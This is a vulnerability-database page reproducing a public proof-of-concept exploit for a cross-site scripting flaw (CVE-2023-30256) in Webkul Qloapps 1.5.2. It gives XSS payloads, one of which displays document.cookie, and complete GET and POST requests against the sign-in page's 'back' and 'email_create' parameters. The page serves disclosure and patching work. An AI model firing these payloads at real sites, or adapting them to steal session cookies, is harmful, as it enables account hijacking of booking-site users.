Lucene search
K

Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)

🗓️ 23 May 2023 00:00:00Reported by Astik RawatType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 232 Views

Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS) vulnerability in hotel reservation & online booking system. Allows execution of XSS via "back" and "email_create" parameters.

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Webkul Qloapps 1.5.2 - Cross-Site Scripting Vulnerability
23 May 202300:00
zdt
GithubExploit
Exploit for Cross-site Scripting in Webkul Qloapps
10 Apr 202316:02
githubexploit
CNNVD
Webkil QloApps 跨站脚本漏洞
11 May 202300:00
cnnvd
CVE
CVE-2023-30256
11 May 202300:00
cve
Cvelist
CVE-2023-30256
11 May 202300:00
cvelist
Nuclei
Webkul QloApps 1.5.2 - Cross-site Scripting
3 Jun 202606:04
nuclei
NVD
CVE-2023-30256
11 May 202311:15
nvd
OSV
CVE-2023-30256
11 May 202311:15
osv
Packet Storm
Webkul Qloapps 1.5.2 Cross Site Scripting
24 May 202300:00
packetstorm
Prion
Cross site scripting
11 May 202311:15
prion
Rows per page
# Exploit Title: Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)
# Date: 15 May 2023
# Exploit Author: Astik Rawat (ahrixia)
# Vendor Homepage: https://qloapps.com/
# Software Link: https://github.com/webkul/hotelcommerce
# Version: 1.5.2
# Tested on: Kali Linux 2022.4
# CVE : CVE-2023-30256


Description:

A Cross Site Scripting (XSS) vulnerability exists in Webkul Qloapps which is a free and open-source hotel reservation & online booking system written in PHP and distributed under OSL-3.0 Licence.

Steps to exploit:
1) Go to Signin page on the system.
2) There are two parameters which can be exploited via XSS
	- back
	- email_create

2.1) Insert your payload in the "back"- GET and POST Request 
	Proof of concept (Poc):
	The following payload will allow you to execute XSS - 
	
	Payload (Plain text): 
	xss onfocus=alert(1) autofocus= xss

	Payload (URL Encoded): 
	xss%20onfocus%3dalert(1)%20autofocus%3d%20xss

	Full GET Request (back): 
	[http://localhost/hotelcommerce-1.5.2/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(1)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d]

2.2) Insert your payload in the "email_create" - POST Request Only
	Proof of concept (Poc):
	The following payload will allow you to execute XSS - 

	Payload (Plain text): 
	xss><img src=a onerror=alert(document.cookie)>xss

	Payload (URL Encoded): 
	xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss

	POST Request (email_create) (POST REQUEST DATA ONLY): 
	[controller=authentication&SubmitCreate=1&ajax=true&email_create=xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss&back=my-account&token=6c62b773f1b284ac4743871b300a0c4d]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation